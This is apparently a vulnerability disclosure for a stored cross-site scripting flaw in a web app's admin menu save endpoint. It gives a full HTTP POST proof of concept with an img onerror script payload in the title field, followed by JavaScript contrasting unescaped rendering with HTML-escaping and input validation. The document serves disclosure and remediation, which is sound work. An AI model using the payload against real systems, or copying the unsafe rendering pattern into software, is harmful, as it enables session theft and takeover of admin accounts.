Found by Chaitin Security Research Lab
url
http://192.168.3.129:8091/admin1#adminMenu/index
poc
POST /admin1/adminMenu/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 145
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminMenu/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}

Then you can view the XSS at the URL:

http://192.168.3.129:8091/admin1#adminMenu/index
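Added example, not code from the issue or from the project: the menu title the PoC stores is rendered into the admin page without encoding, so the fix is to HTML-escape every stored field at render time and to reject markup at save time. Function names, the menu item shape, and the length limit are assumptions.

```javascript
// Characters that can open a tag, attribute, or entity context in HTML.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape a value so the browser treats it as text, never as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored title is concatenated into HTML verbatim,
// so "<img src=1 onerror=...>" becomes a live element on adminMenu/index.
function renderMenuItemUnsafe(item) {
  return `<li data-path="${item.path}">${item.title}</li>`;
}

// Hardened pattern: every field that came from the save endpoint is escaped.
function renderMenuItemSafe(item) {
  return `<li data-path="${escapeHtml(item.path)}">${escapeHtml(item.title)}</li>`;
}

// Defence in depth for /admin1/adminMenu/save: a menu title has no reason to
// contain angle brackets, so reject them at save time (assumed limit: 64 chars).
function isValidMenuTitle(title) {
  return typeof title === "string" && title.length > 0 && title.length <= 64 && !/[<>]/.test(title);
}

// Constructed sample: the "title" and "path" values the issue's PoC submits.
const pocItem = { title: 'test<img src=1 onerror=alert("xss");>', path: "test" };

// Compare both renderings and the validation verdict for the PoC input.
function demo() {
  return {
    unsafe: renderMenuItemUnsafe(pocItem),
    safe: renderMenuItemSafe(pocItem),
    accepted: isValidMenuTitle(pocItem.title),
  };
}
```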